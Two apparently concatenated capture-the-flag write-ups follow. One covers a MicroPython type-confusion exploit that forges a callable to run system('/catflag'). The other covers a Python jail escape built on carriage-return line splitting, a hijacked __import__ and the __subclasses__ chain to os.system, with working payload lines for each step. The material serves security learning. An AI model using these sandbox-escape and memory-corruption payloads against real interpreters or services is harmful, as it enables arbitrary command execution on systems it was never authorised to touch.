Why this challenge was fun#

The high-level APIs were intentionally tiny, so the usual “find a cute Python escape” route died early. That was actually helpful. It pushed me toward the object model, and that is where the real bug lived.

The core idea was:

• unbound built-in methods could still be called with the wrong self
• C code then treated arbitrary objects as if they were mp_obj_list_t
• once that happened, I could build read and write primitives from inside the REPL

So this was not really “Python exploitation” in the comfortable sense. It was memory corruption with Python syntax as the delivery system.

Step 1: Stop chasing imports and start chasing object internals#

The service exposed a stripped MicroPython minimal build. Modules were sparse, os was patched out, and the friendly escape-hatch route was basically boarded shut.

So instead of spending all day begging for a convenient import, I looked for places where the runtime trusted object layout too much.

The important discovery was that self-type checks were effectively gone for several built-in method paths. That meant calls like these became dangerous:

1
list.copy(...)
2
list.append(...)
3
list.pop(...)

If the runtime forgot to verify that self was really a list, then the C implementation would happily reinterpret some other object as list metadata. That is the sort of sentence that makes exploit developers sit up straighter.

Step 2: Build a stable read primitive first#

I started with a read primitive because guessing blind writes in a tagged object runtime is a fast road to sadness.

The useful shape was:

1
r = list.copy(tuple([N, obj]))

With a carefully chosen N, the tuple fields were reinterpreted as list internals like:

• len
• items

Then id(r[i]) effectively leaked raw mp_obj_t words from chosen memory regions.

That gave me deterministic leaks around static objects like builtins and sys, and eventually exposed the hidden VFS dictionary object.

Step 3: Recover useful hidden functions#

Once the leaks were stable, I extracted vfs_posix_locals_dict and recovered function objects such as:

• open
• ilistdir
• stat

That was the turning point. The runtime looked tiny from the front door, but the back room still had useful tools.

One especially nice detail was that open could be called with fake self values such as [] or {}. So even though the method was meant to belong to something else, I could still make it do useful work.

From there I read:

• /proc/self/maps
• /proc/self/mem
• filesystem metadata

/catflag itself was executable but not readable, so the final target became obvious:

1
system("/catflag")

Step 4: Resolve musl and aim at system#

From /proc/self/maps, I recovered the ld-musl base. The runtime-specific offset for system was:

1
0x5c5b6

So the calculation was simple:

1
system = ld_musl_base + 0x5c5b6

At this point the challenge changed from “can I leak?” to “can I write cleanly enough to forge a callable object without destroying the whole process first?”

Step 5: Build the write primitive and respect the low-byte constraints#

The write primitive came from abusing unbound list.append with a fake list object made from a tuple.

In practice I used it in two ways:

• one-step write for bytes 0..6
• stage-two patch for bytes 1..7 while preserving the low byte

Because of tagged-object layout constraints, I could not just drop any 8-byte value wherever I wanted. I had to use staged writes:

1. place an object whose raw low byte already matches the target low byte
2. patch the remaining bytes afterward

That sounds annoying because it was annoying. But it was the useful, honest kind of annoying.

Step 6: Forge a fake callable on the heap#

Instead of trying to patch read-only static objects, I forged a fake function object in heap list storage.

The important fields were:

1
H[1] = mp_type_fun_builtin_3
2
H[2] = system

Then I built two more supporting objects:

• G[1] → pointer to the fake object
• P[1] → raw char * pointer to the string "/catflag"

So this call:

1
G[1](P[1], 0, 0)

went through the MicroPython builtin-call path and ended up dispatching to:

1
system("/catflag")

That is the sort of sentence that should not be possible in a healthy interpreter, but here we were.

Step 7: Trigger and grab the flag before the process falls over#

The full solver bootstrap looked like this near the critical point:

1
run(io, "import builtins,sys")
2
run(io, "t=tuple([450,builtins]);r=list.copy(t);d=r[317];op=d['open']")
3
run(io, "m=op([],'/proc/self/mem','rb')")

And the final trigger was:

1
out, closed = run(io, "G[1](P[1],0,0)", fatal_trace=False, allow_close=True)
2
print(out)

The remote printed:

Flag

bctf{this_was_originally_going_to_be_a_0day_but_someone_reported_it}

The process usually died right after, which felt less like a bug and more like the challenge saying, “Fine, you win, but I’m not happy about it.”

Concept map#

1
mindmap
2
  root((micromicromicropython))
3
    Bug
4
      unbound built-in methods skip self checks
5
      arbitrary objects treated as list structs
6
    Read primitive
7
      list.copy on fake self
8
      reinterpret tuple as list metadata
9
      leak mp_obj words with id of r index
10
    Recovery
11
      find vfs locals dict
12
      recover open and related functions
13
      read proc self maps and proc self mem
14
    Write primitive
15
      abuse list.append fake self
16
      staged writes handle low-byte constraints
17
    Final exploit
18
      forge fake callable on heap
19
      point function slot to system
20
      pass pointer to slash catflag
21
      trigger forged callable
22
      print bctf flag

Why this challenge was fun#

The jail did four things that were meant to feel dramatic:

• it read one line of input
• it rejected any literal .
• it cleared builtins.__dict__
• it executed my code with only one helper: set_builtin

That sounds restrictive until you notice one very important detail: giving me a primitive that can write back into builtins is a bit like locking the kitchen and leaving me the master key under the mat.

Step 1: Realize that “one line” is not really one line#

The first crack in the wall was transport, not Python syntax.

input() stops at \n, but raw \r characters can still exist before that newline. Python treats \r as a valid line separator during parsing.

So this:

1
line1\rline2\rline3\n

executes as real multi-line code.

That was lovely. The jail wanted one line. I handed it several lines wearing a trench coat.

Step 2: Rebuild import capability with the one primitive it should never have exposed#

The jail code was tiny enough to explain the whole failure:

1
code = input("code > ")
2

3
if "." in code:
4
    print("Nuh uh")
5
    exit(1)
6

7
def set_builtin(key, val):
8
    builtins.__dict__[key] = val
9

10
exec = exec
11
builtins.__dict__.clear()
12
exec(code, {"set_builtin": set_builtin}, {})

The crucial helper was:

1
set_builtin('__import__', lambda *a: set_builtin)

Now import statements worked again, but they returned my chosen function object. That meant I could use import syntax itself as a delivery mechanism for globals.

Step 3: Avoid dots entirely in stage one#

I still had to satisfy the outer lexical filter, so stage one stayed completely dotless.

The clean trick was:

1
from x import __globals__ as g

Because the fake importer returned set_builtin, this bound:

1
g = set_builtin.__globals__

Those globals still contained the saved privileged reference:

1
exec = exec

So I could do:

1
g['exec']("...", {}, {})

Still no literal . required in stage one. The jail was trying to police syntax while I was already using its object graph as a subway system.

Step 4: Use stage two to bring dots back through escapes#

The second stage lived inside a string passed to g['exec'](...). That meant the outer source only had to avoid literal dots. Inside the string, I could encode dots as \x2e and let Python decode them later.

The real payload walked the object graph like this:

1
[x for x in (1).__class__.__base__.__subclasses__() if x.__name__=='_wrap_close'][0].__init__.__globals__

That gave me an os-backed globals dictionary containing system, and then the finish was:

1
o['system']('cat /flag-* /srv/flag-* 2>/dev/null')

Very rude. Very effective.

Step 5: Send the whole thing as one CR-separated payload#

The logical three-line payload looked like this:

1
set_builtin('\x5f\x5fimport\x5f\x5f',lambda *a:set_builtin)
2
from x import __globals__ as g
3
g['exec']("...stage2 with \\x2e escapes...",{}, {})

The solver packed it into one input string with \r separators:

1
line1 = r"set_builtin('\x5f\x5fimport\x5f\x5f',lambda *a:set_builtin)"
2
line2 = "from x import __globals__ as g"
3
line3 = "g['exec'](\"" + second_stage.replace('"', '\\"') + "\",{}, {})"
4
payload = line1 + "\r" + line2 + "\r" + line3 + "\n"

And the second stage itself eventually resolved to:

1
o=[x for x in (1).__class__.__base__.__subclasses__() if x.__name__=='_wrap_close'][0].__init__.__globals__
2
o['system']('cat /flag-* /srv/flag-* 2>/dev/null')

Step 6: Read the flag from the remote output#

The automation was simple:

• connect over SSL
• wait for code >
• send the CR-separated payload
• read until close
• regex the flag

The returned flag was:

Flag

bctf{congratulations_ctf_agent_6_from_solver_swarm_2_for_solving_this_challenge}

Why the jail failed#

The challenge is a nice reminder that blacklist filters age badly in computer years, which is to say immediately.

The actual failures were:

1. banning literal . is only a lexical filter
2. \r still creates real multi-line code
3. set_builtin lets me rebuild exactly what the jail removed
4. a saved exec reference in reachable globals is basically a gift basket

Concept map#

1
mindmap
2
  root((build-a-builtin))
3
    Filter weakness
4
      dot character is banned
5
      carriage return still splits logical lines
6
    Bootstrap
7
      use set_builtin to restore import
8
      fake importer returns set_builtin
9
      from x import globals as g
10
    Escalation
11
      g contains saved exec reference
12
      g exec runs second stage source
13
      second stage restores real attribute access with escaped dots
14
    Escape
15
      walk subclasses to wrap_close
16
      recover globals with system
17
      run cat on flag paths
18
      print bctf flag